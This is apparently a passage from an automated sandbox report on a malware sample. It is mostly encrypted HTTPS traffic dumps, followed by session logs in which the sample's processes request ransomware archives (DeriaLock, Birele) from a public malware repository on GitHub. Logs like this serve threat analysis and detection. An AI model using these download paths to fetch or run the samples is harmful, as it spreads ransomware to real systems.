                                                                                                                                                            2022-09-29 12:47:40 UTC38821INData Raw: d4 86 6b f1 b4 ec 7f 13 51 71 24 cd fd f7 d0 76 db df 31 89 4b 8a d4 a1 fb 87 ad 45 9e b7 87 35 90 aa 86 5a ec 83 20 fb 16 f3 0c 50 62 14 4b df 7d fb af 1c 6a 8a d1 15 20 49 b0 1b 30 2b e0 c9 23 25 0f bd 0f 2d 90 ee 76 2c 62 92 20 a9 5a c9 d7 4f d0 ac a8 c9 35 c5 c1 ed 6c 8c 7e 7d 9c c3 6a bb 97 25 ac 31 3c e8 55 c2 1a 84 4e ef 14 0e 40 2c c5 bc 70 30 2c db 62 30 56 af 82 2c d3 b6 b6 a2 10 77 a8 1e a2 3f f8 cd 68 cc d3 cd dd d9 36 1f e7 5c 94 ce 30 fc 63 0f bb 7f 04 63 a0 ec ad d4 a2 27 e1 77 40 a5 22 02 41 45 f8 54 9b 5e a6 2f 77 0f b6 06 96 82 a0 45 7b a7 00 2d 93 36 97 fa a8 27 3f b7 61 be 31 ab 0c da c1 9c 95 88 13 7c 85 a7 dc 22 ba 67 19 db a8 75 e9 06 62 da f2 d8 1c ea 52 22 5f 2b b0 5a 67 2c 57 81 be a3 7e 43 3b 90 0c 62 8c 4f 0b ff 45 be ed d2 6d
                                                                                                                                                            Data Ascii: kQq$v1KE5Z PbK}j I0+#%-v,b ZO5l~}j%1<UN@,p0,b0V,w?h6\0cc'w@"AET^/wE{-6'?a1|"gubR"_+Zg,W~C;bOEm
                                                                                                                                                            2022-09-29 12:47:40 UTC38837INData Raw: a0 4a de b4 92 1e 09 2f f2 3d ff b7 e5 3b 1c 4e 91 6c 72 e5 41 4b 31 a6 13 6b 68 68 ef cb 3d 9f 07 67 d0 92 af 4b 90 10 1f 7a ba 23 47 36 dc 10 bb 91 1e 41 34 04 05 20 04 e7 d9 36 b8 4e 2c 43 2b 1e 8d a1 82 f3 a8 4c 54 04 9e 8a 53 37 7d 98 68 f1 ef 2b 5c 25 3a c3 40 f9 c3 bf d9 9f 52 13 1f d5 0e 09 a9 3e 7d ae 34 19 2c 9a 12 44 77 9e eb 35 35 90 1a 3e f6 29 67 ca 60 6c 6f 4f 71 3d 65 c9 c1 c9 a6 c7 4e bd cc 25 07 dd 4b 95 f5 00 27 20 f0 4d 2b 74 30 5a b5 81 cf c7 bf 1b c9 73 d9 be 0b a6 58 41 5b 07 17 19 95 09 67 2c 0a 31 11 35 e6 9d 2e 29 c9 df bb 8b 63 f3 f0 a4 79 8e f9 b4 27 e6 5e 8d e5 34 47 73 72 ce 98 dd 87 b7 b8 97 b7 16 6f 21 d8 13 c3 3c 64 02 dd 0b 3f b6 10 1e 74 5d 53 31 c0 ab e3 6e 56 fb 8b 5b e7 6e 15 7f bd 4d f5 ba 78 84 99 59 ce 6b 57 b6 25
                                                                                                                                                            Data Ascii: J/=;NlrAK1khh=gKz#G6A4 6N,C+LTS7}h+\%:@R>}4,Dw55>)g`loOq=eN%K' M+t0ZsXA[g,15.)cy'^4Gsro!<d?t]S1nV[nMxYkW%
                                                                                                                                                            2022-09-29 12:47:40 UTC38853INData Raw: 9d 54 52 81 1a e0 2f aa bc 16 78 5f aa d0 3f 4e 15 64 0f 25 55 b5 86 7c c0 05 73 b2 05 c6 44 8a 6e 7c 8d 2b 0d 68 81 d2 06 2a b5 ec cf 34 5e 82 e6 21 ae 71 aa 72 44 14 ce a0 1a c3 ff ea fe 34 09 6d 5a 24 b6 90 30 b4 c0 94 c3 a0 62 b0 79 18 ab df 66 e7 56 84 8d d1 c3 45 e0 2a 1c 71 b6 98 22 19 c3 e3 3b c7 6b dd 12 16 e8 64 c7 5e 51 e8 d0 5c b9 5e 48 35 8e f6 4d 78 a8 83 ce ef 2d dc fc aa 72 e4 6b a6 53 54 8d 6d 0c fa d6 e0 a4 a9 7b 03 b6 d5 64 fd 20 fe 7f 5f 12 48 58 33 20 4a b6 e4 5b 56 60 42 a8 22 89 df 90 f1 62 32 10 3c 9b 05 9c fd 24 4b 6f c1 07 a4 97 70 cb 66 ab fc c5 c0 9c 31 de 06 72 d4 07 63 78 9f 8d 82 99 32 9f ef 6f 38 7d f9 98 d7 06 1e a6 8a 21 bb 99 01 44 69 f2 e3 d9 6f 4f b7 b1 d7 65 7a bb 5a 3c 4b c8 16 19 7c 39 cd fe 4f 31 2e 65 88 50 bc f1
                                                                                                                                                            Data Ascii: TR/x_?Nd%U|sDn|+h*4^!qrD4mZ$0byfVE*q";kd^Q\^H5Mx-rkSTm{d _HX3 J[V`B"b2<$Kopf1rcx2o8}!DioOezZ<K|9O1.eP
                                                                                                                                                            2022-09-29 12:47:40 UTC38869INData Raw: c7 51 be ab f7 43 31 2d a6 9b 5a c2 b2 e8 76 85 a6 05 3a d3 55 bf b8 45 b0 04 44 f5 57 31 6b 06 53 79 18 14 05 a5 2d 80 07 d7 8a c6 d7 54 6a 55 a4 2c a8 64 9e 3f 5d e1 f5 5d 6d 3f 76 f1 c5 06 2b b8 b0 b9 94 ac a5 01 bd 0c 4b 4a 7e 16 7e 14 cb 13 e2 86 3b 89 5b 86 41 e9 3e 7a a0 90 63 76 28 a2 92 61 44 6a 0c 18 83 7a 56 1c ca 89 94 65 92 58 0c 9a 39 72 5a 85 77 37 50 d3 71 99 a5 0e dd d5 c1 1d 7e 56 ad d0 2c 8f 42 d3 5a 52 a5 e6 6c 94 74 63 01 04 11 e6 be 95 29 a5 f2 85 e1 b9 2b 73 f2 96 53 35 89 90 20 af f3 f0 76 4c e9 ce 21 3b a3 b8 ed 32 55 33 0b df e0 fd 5a db 73 bd 61 49 dd 14 6e 28 19 da 3d b9 90 b3 83 c2 c3 2b e9 7e 1c c2 6e dc 84 12 b1 f8 0b d9 33 76 c9 24 c4 67 b1 9f cd f1 5d 31 d3 96 2b 9c f4 0f 14 36 e3 3e f5 1b 61 5a 19 03 61 7d c4 15 7a 66 94
                                                                                                                                                            Data Ascii: QC1-Zv:UEDW1kSy-TjU,d?]]m?v+KJ~~;[A>zcv(aDjzVeX9rZw7Pq~V,BZRltc)+sS5 vL!;2U3ZsaIn(=+~n3v$g]1+6>aZa}zf
                                                                                                                                                            2022-09-29 12:47:40 UTC38885INData Raw: e3 4a 41 0b 3c 2d 04 77 7f 12 6f 92 99 86 2f c7 56 ea 81 cb be 00 b3 a6 14 88 fe 45 80 e0 52 3e 0b 73 d6 61 09 38 d0 ec 6e 00 a3 2c 8c 65 eb 8e f0 5d d2 e6 8b 1d 28 3f 19 2b 09 2d 53 51 a2 af f5 95 15 8a ba a6 e2 16 5e 2d ef fd df cc 90 12 b3 22 49 16 31 83 b1 74 71 f8 5d f4 e2 db 0e e8 63 29 57 22 be b8 65 bc 7f 01 d9 d4 45 00 8b 9c 06 8c 09 a6 1a a5 85 f4 52 d4 50 01 e7 37 53 df 8e ad f2 09 e2 16 f4 34 69 ab e0 ce ea eb 0d 0e 10 76 13 8e fd 2a 6e 0f 16 34 6f 19 61 cd 9c fd ee f7 b0 02 13 4f 66 26 65 c0 f3 76 72 e9 b7 ae 59 db a7 d1 bd ef 1a 70 58 49 50 34 0f 24 ad 99 43 3a 76 d2 87 96 95 2d 3a f5 ff cf 3a da af 7d f0 7b eb 7e 03 f5 fd d0 9d 13 09 bb 39 1d 41 ae ed c7 e4 92 38 9a f3 2c 43 35 8d cd 88 d1 bf c8 0a c8 e7 d1 9e 7b 78 ef b3 af 8d 38 3a 2c f6
                                                                                                                                                            Data Ascii: JA<-wo/VER>sa8n,e](?+-SQ^-"I1tq]c)W"eERP7S4iv*n4oaOf&evrYpXIP4$C:v-::}{~9A8,C5{x8:,
                                                                                                                                                            2022-09-29 12:47:40 UTC38901INData Raw: be c4 36 0f e3 ee be 1b a4 2b 62 2b 98 f6 95 f1 29 b3 7c 46 85 15 40 64 9c 68 16 6c bd dc 67 b5 36 f3 05 ad 41 35 8a 32 d3 e3 d5 e1 ad ca 4e 24 ff 32 ea 55 fb 3a de 31 a3 22 e9 14 47 c0 7a 60 79 10 49 52 8d 86 3d 8f b5 9d cb 63 e8 02 f2 cf df 81 2d d5 b4 a6 48 24 6a ba cb f4 29 cb 89 1c f7 31 45 ed b6 42 30 84 5b 9c 1c d4 0b e0 c6 2f cd 26 79 93 b4 46 9b 8f a9 96 f4 36 60 9c 92 f2 66 cb 64 bf 38 6e 81 a2 2c e6 46 f6 ea 95 a5 32 d7 43 8d 67 ce 3c c9 81 ab f7 41 8c a7 d4 c2 73 91 88 d7 37 a0 fb 27 43 ef 1d b0 c1 0c cf ec 66 a3 75 28 c3 a4 c3 5e 8b 0e 5e ba d4 b4 95 82 d3 a5 14 48 34 f1 c0 4b ef b4 89 e9 41 b4 7e c5 79 76 a4 38 de 8e c2 b0 49 07 11 0c ae f9 4d fd ad 6a 97 5d fa 2b bb ba c0 44 3f 0f 33 52 67 06 a4 6f 02 15 d2 14 0b f7 6f d1 8b 9e 79 cb b5 e8
                                                                                                                                                            Data Ascii: 6+b+)|F@dhlg6A52N$2U:1"Gz`yIR=c-H$j)1EB0[/&yF6`fd8n,F2Cg<As7'Cfu(^^H4KA~yv8IMj]+D?3Rgooy
                                                                                                                                                            2022-09-29 12:47:40 UTC38917INData Raw: fe 2e f0 c0 f6 23 60 dd 4e 60 3e 56 fa 4f 2b 1a ee 56 54 7c fc 44 f8 5f 4c c6 a2 54 62 03 43 e7 b3 93 ae 4d ee 45 3f 5e 5c 69 43 51 f1 aa e4 51 3c 24 03 d0 8d 61 11 a3 98 51 89 30 a2 88 72 40 83 73 e1 6e a2 64 0e e0 59 c4 51 26 07 77 7e e4 12 b7 3d a6 b0 f5 db ae 8b 4a a4 f4 8a 54 f7 21 c1 c6 50 52 4b 74 72 b2 9c 53 ec 46 55 43 09 35 2f 23 0b c2 5b 8f d3 03 82 79 a9 4e 42 b1 78 a5 a7 bb 9e a5 8d d1 8f 97 a8 7d 25 cf ac a6 e2 b7 40 41 7b 95 95 50 89 21 b5 ef ba f2 d7 29 66 d1 f9 37 34 77 1c 74 2a dd c3 ee b8 71 89 fc 19 cf 7f 97 de be f7 41 24 80 12 22 49 88 4c 21 e0 cc 90 c0 46 4e ba 2b de a4 a0 04 b8 44 12 8b 2d c1 59 a0 93 98 0e 95 c3 ea 55 6d e8 cf af 26 0d f7 9b b6 fa 27 af bd 50 ba d2 42 9f 2c 2d 93 74 9b 00 1b cb d1 fd 3d 63 26 a7 15 f0 ea f4 92 bd
                                                                                                                                                            Data Ascii: .#`N`>VO+VT|D_LTbCME?^\iCQQ<$aQ0r@sndYQ&w~=JT!PRKtrSFUC5/#[yNBx}%@A{P!)f74wt*qA$"IL!FN+D-YUm&'PB,-t=c&
                                                                                                                                                            2022-09-29 12:47:40 UTC38933INData Raw: 58 5e d6 4a 80 27 ab 96 ed 6e 43 34 3c 9e 0e e2 95 d5 dd c7 92 cf 80 ef 1d 4e 93 48 3d 5b ba cb dc 3f 2f bc b4 5d 1b c5 ea 6c af 2c 19 b1 62 8f 86 c4 fb b1 ee e1 bf 97 31 bd bf 69 ee b8 20 59 4b b1 c3 cb b8 a9 dd b0 aa a5 3b d3 3f 08 9f df b4 5f c3 9a 64 d1 2c 33 00 1c 1f 67 05 e2 81 f9 99 61 ed b6 40 5d 70 a7 d9 5b ca 90 76 ae a4 28 3f 98 d9 fb d8 b0 7c eb d7 24 96 3d 28 da a1 61 1f 41 e3 43 1e 13 1c 61 d4 10 c5 41 c2 26 77 6c 7c 46 cf 6f ea e1 16 27 f2 ae 2d 64 35 97 7a ae b1 32 cc 92 3c a8 2d 85 85 06 36 d5 99 ab 7c 5d 93 bf 08 85 5c d1 c4 7f e0 37 97 ee 30 72 a5 84 1a df 21 b0 66 cf c2 34 1f 49 f7 74 f5 04 da 02 a4 3b 1b 14 6a ee a5 6a 92 c9 b4 50 9a e4 50 7f 1a 72 f4 f0 60 31 37 a1 0c cc d6 ab dd 67 26 dd 26 1c 54 56 ac 08 37 6e 02 5f 67 8c 2c df 49
                                                                                                                                                            Data Ascii: X^J'nC4<NH=[?/]l,b1i YK;?_d,3ga@]p[v(?|$=(aACaA&wl|Fo'-d5z2<-6|]\70r!f4It;jjPPr`17g&&TV7n_g,I
                                                                                                                                                            2022-09-29 12:47:40 UTC38949INData Raw: 67 aa f0 0d ca 49 da f9 99 4b 56 bb a7 b3 10 15 41 01 d2 af 6d c6 da 67 4f f6 cc 93 f3 33 ee e8 6b c6 7e 8e 72 5c 00 a4 2a 1e d7 23 37 f5 af 85 a5 3e 97 e2 0d cc a7 74 2a 59 33 9b 74 cd 72 f5 e1 56 f4 73 66 67 e3 1f 61 b3 b8 6f 14 3b 6b f7 b4 05 43 ed 0d 23 20 65 d0 69 84 0d 59 6d c6 47 aa cc 8e 4e 70 c0 66 9a 4b 13 34 34 d3 83 f0 b8 7c 2e bf 8e 94 77 3e 25 78 9f 00 67 f3 0a b2 07 3d cf 25 26 47 7a 81 83 a1 50 73 f3 47 44 33 19 fc 0c 56 c3 54 7f aa 5b 3c dc 87 0b 0a a9 38 02 1c f0 e1 08 11 6d b3 1e 2c 71 54 a9 f4 a6 51 df f3 19 fa e1 aa 18 93 32 72 c8 e4 0c 32 bb f4 b4 8a 33 44 e7 dc 1d cd 87 20 b9 8d 1b 8c cf 7f ee 6e ea 7e ff 25 76 c7 77 74 f6 fd 94 55 39 24 e1 fc 6c d9 6a ed 81 a3 19 5f 39 77 24 da ec f7 30 bb 92 e7 6b 45 36 ab c5 af fa 67 04 10 b7 51
                                                                                                                                                            Data Ascii: gIKVAmgO3k~r\*#7>t*Y3trVsfgao;kC# eiYmGNpfK44|.w>%xg=%&GzPsGD3VT[<8m,qTQ2r23D n~%vwtU9$lj_9w$0kE6gQ
                                                                                                                                                            2022-09-29 12:47:40 UTC38965INData Raw: 61 25 1f 5e a1 06 2b 66 a9 f7 48 81 b5 01 7d df 1a 0c aa 4c 39 62 c0 9b db 44 3b f0 90 62 c8 9f f1 31 f1 88 a5 a0 4e 15 99 7d 3d 5e 61 eb 32 33 ff 06 4c 23 3b 2b 76 c9 2d 62 12 9d 11 66 36 79 7f db 00 1c 23 6d fe 48 d2 1b ff 6a ad 76 c1 58 2d bf 7f 40 7d 84 d1 45 13 8c 23 3a 11 fc 09 13 f6 0d 02 b6 7e 13 b0 1c 04 d8 b9 bf 32 f9 04 f5 9e 08 e9 47 81 a9 b4 8b 71 80 4b fe c8 c1 4d c5 37 b5 c9 a1 c5 62 82 6f 94 4a 07 05 82 59 fa e3 a1 27 de b6 7d 1f ad d9 69 34 a3 e9 38 6d 59 51 2a 72 4d 31 97 a5 ff 74 d5 d5 91 f1 72 5f a1 1e c4 c8 97 f3 73 4a 7d 96 9c db 11 5f ca 80 1a b3 20 0c d6 da 9e 54 b9 31 6b 06 2e b1 a7 f4 14 c2 c6 64 2b 04 5a d6 9d 58 b6 0b fe ab e0 92 50 ed 61 44 f5 ac 00 91 e0 40 6a fd b1 4b 06 77 d9 db cf 3d bf 13 c8 0b 08 11 55 ab 7a 58 f5 88 c4
                                                                                                                                                            Data Ascii: a%^+fH}L9bD;b1N}=^a23L#;+v-bf6y#mHjvX-@}E#:~2GqKM7boJY'}i48mYQ*rM1tr_sJ}_ T1k.d+ZXPaD@jKw=UzX
                                                                                                                                                            2022-09-29 12:47:40 UTC38981INData Raw: 8a 6f 4b 26 b6 48 55 3f b0 5b f8 73 55 40 f2 c6 f8 0a 51 4f 4c 32 3c f6 4c d9 41 35 36 7e 17 bb 8b a1 cc 2d f1 4f f1 52 0a f7 a4 69 45 6d c1 5b 40 51 91 c7 23 4f 8d d8 ff 20 d2 f9 92 e2 ed 9b 31 62 6b 1d eb 08 2f ba 40 1b 6e 1f b9 f4 fd ac d7 ef a1 27 44 ed ed 69 66 6c 10 e7 51 5f 7d 25 2f 00 01 57 c0 81 93 e6 ae 5d 9e 93 ff 5e 88 31 cb 2d 13 66 04 b2 cd ea 10 38 6d b3 bb 47 d0 fa 68 10 6a e5 b4 d1 f3 09 53 77 c6 28 7b fe 24 31 ad c6 82 35 cc 6b ec 7b dc 94 5e 3b c3 8d 94 d7 fa 5b 89 07 12 47 75 ee fd b1 3b 25 9b f9 44 14 e3 73 ab 84 2a e4 e4 9c 4b 35 f2 a6 25 f2 fe c3 da 0b 59 7b 28 c0 7f d7 1b b7 7a ae 6a a8 13 c0 dc ec db 2f 11 a8 8b 46 7f c1 64 fc b6 2a aa 0b 10 3c db 7f 9f eb 35 d0 d5 72 ab 93 df dc 25 eb bf 2c 75 2c f3 75 9d 74 b3 32 b0 c4 a6 78 fa
                                                                                                                                                            Data Ascii: oK&HU?[sU@QOL2<LA56~-ORiEm[@Q#O 1bk/@n'DiflQ_}%/W]^1-f8mGhjSw({$15k{^;[Gu;%Ds*K5%Y{(zj/Fd*<5r%,u,ut2x
                                                                                                                                                            2022-09-29 12:47:40 UTC38997INData Raw: 3e 92 8d 4d 0f 81 9c 2b c3 0f 1e 60 bc 72 87 c2 f1 f5 71 0f 29 69 ca f3 b1 05 cd 66 db 6e d3 dc 21 44 88 cb 8d e5 bb 51 5e 35 36 89 f1 15 7b c2 5f d5 66 33 08 04 a0 a1 cd ea 00 cf 82 74 53 71 ee 61 56 dc 37 2c 20 75 1f 59 55 05 60 d3 d2 af 1d 35 2e e7 65 41 d8 c0 4c af c8 4c 32 2e 19 f5 aa 52 88 fa 01 39 ee bb 29 f5 19 14 61 fc 61 f4 04 34 e4 14 72 49 ef f5 80 52 24 a2 95 fc c9 69 30 21 9f 3e a7 98 ea ed cf 95 df 72 ac 08 b6 1a 1a 65 2c e7 ff 2f 8c 0c 08 59 b4 43 4e 3a 3d 5f 59 2b 3e 06 78 ed e5 2d 83 5b 1f cc ac 50 03 c0 d2 3d 9b 35 e1 54 a4 4f 97 3a a5 1a de 4e 38 02 49 a0 63 16 de b8 6f 57 50 08 3c b2 11 01 e3 56 1a 86 d9 a4 21 54 2b 1e 2f e5 f6 9b 5e b2 1c 05 e1 c6 6b 4a a1 4a 4b 38 30 44 21 41 d5 72 1f 4a af bc bd a8 c5 f0 2e c4 b4 5e 2a 0d 0b a1 5b
                                                                                                                                                            Data Ascii: >M+`rq)ifn!DQ^56{_f3tSqaV7, uYU`5.eALL2.R9)aa4rIR$i0!>re,/YCN:=_Y+>x-[P=5TO:N8IcoWP<V!T+/^kJJK80D!ArJ.^*[
                                                                                                                                                            2022-09-29 12:47:40 UTC39013INData Raw: 1f 84 5e 6b ad 9e dc 39 9d 38 6f 59 04 11 4d 51 38 44 da f5 2a 43 0e f0 1a 26 4c ab 42 a9 52 4a c9 45 fc 3b 14 70 16 63 17 10 6f 0d f7 c2 3d 73 44 bd 89 a0 78 f9 91 3e 11 74 fc a4 d0 48 db 4b ee b3 3e a7 8e 51 79 69 aa a9 b3 fb e8 1e cf a2 a7 eb 2d 9a 7b 83 d4 b8 a9 0b 1d 7e b5 0a 5d 65 c6 f2 65 4b 07 55 22 9b ba e1 0f d6 19 1f 88 ab 12 54 38 00 7a 5f d5 f8 9f 6b 01 44 6a 1b fa f6 93 c1 d9 4c 7a f5 1f ec f7 29 b6 16 dd 24 a4 a6 1f c5 3f 6e f3 7c 93 59 1a 96 89 5f 59 2d 6c c6 e5 bc 3c 61 34 4f 41 d2 f1 d0 49 c4 95 03 64 53 3f 5f a7 8f 1d ad ed 8f 00 4a 2f d2 04 15 4d 6c e0 99 0e 53 0d 39 24 78 a7 64 4c 00 2c 6a 7b fc aa 67 7b 5f 6e bc ba 70 c7 0c 18 7b 57 48 6e 74 07 f4 a2 d4 ee 06 e1 0a 80 06 b9 9b 5f a7 79 0a eb ed 5a 86 1e 25 f4 ca d2 70 0c 40 67 e2 fc
                                                                                                                                                            Data Ascii: ^k98oYMQ8D*C&LBRJE;pco=sDx>tHK>Qyi-{~]eeKU"T8z_kDjLz)$?n|Y_Y-l<a4OAIdS?_J/MlS9$xdL,j{g{_np{WHnt_yZ%p@g
                                                                                                                                                            2022-09-29 12:47:40 UTC39029INData Raw: 97 22 1e d3 c7 13 95 1f f2 12 6a a9 7e be 2e d7 e9 4a 4d 35 d9 36 8b 35 fd e1 09 6c d2 19 43 19 38 06 7e ad bd 50 39 41 9a a5 e5 7d d5 d3 d7 8b 8b d2 50 9a 44 73 4c 1b 71 54 55 9c 61 e2 50 c5 95 69 0c 6c 74 fb b5 74 cc e2 4e fb 7e 4c 58 7b 3b b7 99 b3 29 51 e6 45 58 40 e7 06 6d 3c e3 f4 73 42 77 53 e6 54 45 16 bc 45 8f f9 0d fa 0b 6a df e8 18 28 1a 36 2c 13 ba 09 76 f2 57 6d 7c 34 af 84 c9 be 94 f5 7d 7d 08 9e 37 50 04 29 9e e1 5f e6 4b 1e 80 eb af db ce 7d 72 ee 70 59 c6 63 e2 f3 5c 21 b3 f6 12 8e 52 a3 2c 54 79 1f ac 5f a6 14 87 69 16 73 d9 fa ab c9 d0 32 29 f1 72 72 77 5a 5f fd 64 91 01 a7 7a 50 13 dc 27 54 e9 d3 2b a7 8e 32 4b d6 b7 86 c7 40 ad d2 0e 77 01 68 ab 13 58 08 23 43 70 e4 e5 f6 70 9c e6 92 72 fa 66 01 3c 3f cf 6e 5a 43 6d 42 d4 49 61 03 b1
                                                                                                                                                            Data Ascii: "j~.JM565lC8~P9A}PDsLqTUaPilttN~LX{;)QEX@m<sBwSTEEj(6,vWm|4}}7P)_K}rpYc\!R,Ty_is2)rrwZ_dzP'T+2K@whX#Cpprf<?nZCmBIa
                                                                                                                                                            2022-09-29 12:47:40 UTC39045INData Raw: 6a 52 35 d1 8e e4 ab 1b e0 4c e2 5e 21 77 79 13 c6 01 94 cc d5 79 f8 8b 4a da d5 7c c9 f7 25 ff 7c 81 56 e7 68 60 fb cc e4 76 71 69 be 72 03 d9 fb cd 69 a5 dc 74 ae a8 97 17 b0 77 f7 18 85 54 b7 db fb 9b 55 e0 bc 20 d2 8e 30 87 5d 63 42 22 a2 6f 17 ab 6a 13 ef 69 30 18 46 37 01 5d 76 08 3e 59 fa 27 90 2b 66 e5 43 d1 aa cc 83 d0 2d 38 29 dc 78 a4 23 b1 79 f8 ae 7c 8a b0 63 18 c7 d4 a3 e2 d8 a9 68 cd 63 2c ab 8a 0f fd 79 ea e3 e5 e3 06 bf c6 f4 72 41 6b 17 e7 65 3c d4 7c c1 1e 52 be 48 e3 35 7c b7 5e 7c b2 9b 1b 2b 8e 22 ad 92 99 66 89 d3 12 80 b4 8b 3f d4 f2 c1 f1 e3 8e 4c 85 a3 32 8e a7 4a 62 7e 37 e9 14 12 d8 8b 10 63 bc 00 c1 5f 36 f2 f8 9c a6 e5 b0 e4 1d 8e fe d2 17 31 cf 6f 99 cc cf be 4f e6 30 ed e5 0d 6b bc b1 bb 12 f1 52 89 9a 9f 05 a1 1f f0 da 2e
                                                                                                                                                            Data Ascii: jR5L^!wyyJ|%|Vh`vqiritwTU 0]cB"oji0F7]v>Y'+fC-8)x#y|chc,yrAke<|RH5|^|+"f?L2Jb~7c_61oO0kR.
                                                                                                                                                            2022-09-29 12:47:40 UTC39061INData Raw: f8 f9 e8 4f e7 36 b0 55 32 38 31 a5 17 a7 d8 45 bc 06 28 bc b4 5f e5 ce aa 58 3f 31 0b 48 ca 07 70 fa fe 44 3c 11 ce e2 53 21 92 01 7e 17 42 46 d8 ac 49 a0 42 0d 4d a1 3d 45 c5 7e 0c 9a ba 4c d1 9f 16 1c 97 c6 75 90 e4 01 b7 f6 fe ff d6 fb 64 76 36 50 c2 40 3b fa 2e 26 64 ff 2d 2b b5 84 a7 39 7b b8 b4 a2 1c f5 7d a0 57 b0 d7 fe 7a c5 5e 2a 45 d0 f0 34 14 e6 de d2 be 76 ee 37 24 3b 03 c2 68 09 ba 78 b7 8a 46 b6 32 64 f9 7c b4 38 26 f6 12 5d e3 a7 61 84 85 dc f6 04 61 d7 2c a8 e5 2a f6 df 93 b0 61 9f e3 44 b3 28 f9 29 39 84 0c 64 7d 7f 0f 4c 20 62 f5 13 54 fe ec 15 06 26 0a 8a 06 f6 af 55 d9 d4 03 fd d5 a4 dd 6d 81 6a 4f a3 1c b3 dd 41 33 c0 5d 46 cb 36 d2 6d 68 39 d7 7e a8 38 04 7e 33 75 06 a1 50 83 36 d5 6f 28 8c b9 22 58 12 4e dc 97 ca 44 d9 61 7a 37 27
                                                                                                                                                            Data Ascii: O6U281E(_X?1HpD<S!~BFIBM=E~Ludv6P@;.&d-+9{}Wz^*E4v7$;hxF2d|8&]aa,*aD()9d}L bT&UmjOA3]F6mh9~8~3uP6o("XNDaz7'
                                                                                                                                                            2022-09-29 12:47:40 UTC39077INData Raw: 67 ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46 35
                                                                                                                                                            Data Ascii: g?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF5
                                                                                                                                                            2022-09-29 12:47:40 UTC39087INData Raw: 89 d9 04 7b 1a 72 5f 70 e3 b9 d5 f4 a1 e0 04 fd 95 77 63 91 53 e4 07 43 2b 28 85 21 97 46 c6 4e 21 82 14 4c 3a af 50 52 7b ed 80 ef ab ad a4 42 8e e0 fb c5 cc ff 0f b5 56 59 aa 74 3e 4e 4b 8b c1 a5 63 71 55 98 97 e1 ad 42 09 81 13 e8 a0 2c 1f b1 fd 02 2c 91 d3 9a fd 45 25 05 f5 3a b0 b2 d0 85 bf 9a 7d 81 22 e3 dc ee 3f 7d c1 4e c2 96 88 ae f6 b7 c9 ca 38 5b a5 c4 49 e8 d0 88 31 d7 7f 83 20 46 34 c9 c5 c6 63 f8 10 de 16 e2 b0 76 4e eb 90 e5 04 67 52 df 26 ae 47 23 d0 61 26 b4 60 f0 9a 52 00 8f bd 23 9f 09 38 74 16 b8 56 c2 d9 2a 02 42 cd 0c b4 9d ba 3d 01 5e 73 f8 c5 38 09 bd c7 8e bb 45 60 fa 4b af 5a 35 a5 89 e0 30 af c6 61 19 96 c4 7a 5a ef cd 4c da b2 87 4d dd 35 bf 42 5d fc de 42 e1 71 df 14 05 6b ff 2c f8 84 cc 43 1c ce 06 50 3f dd ba 0d 2c 81 44 20
                                                                                                                                                            Data Ascii: {r_pwcSC+(!FN!L:PR{BVYt>NKcqUB,,E%:}"?}N8[I1 F4cvNgR&G#a&`R#8tV*B=^s8E`KZ50azZLM5B]Bqk,CP?,D


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            16192.168.2.649716185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC702OUTGET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            160192.168.2.649898140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC39087OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            161140.82.121.4443192.168.2.649898C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:47:40 UTC39087INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:59 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
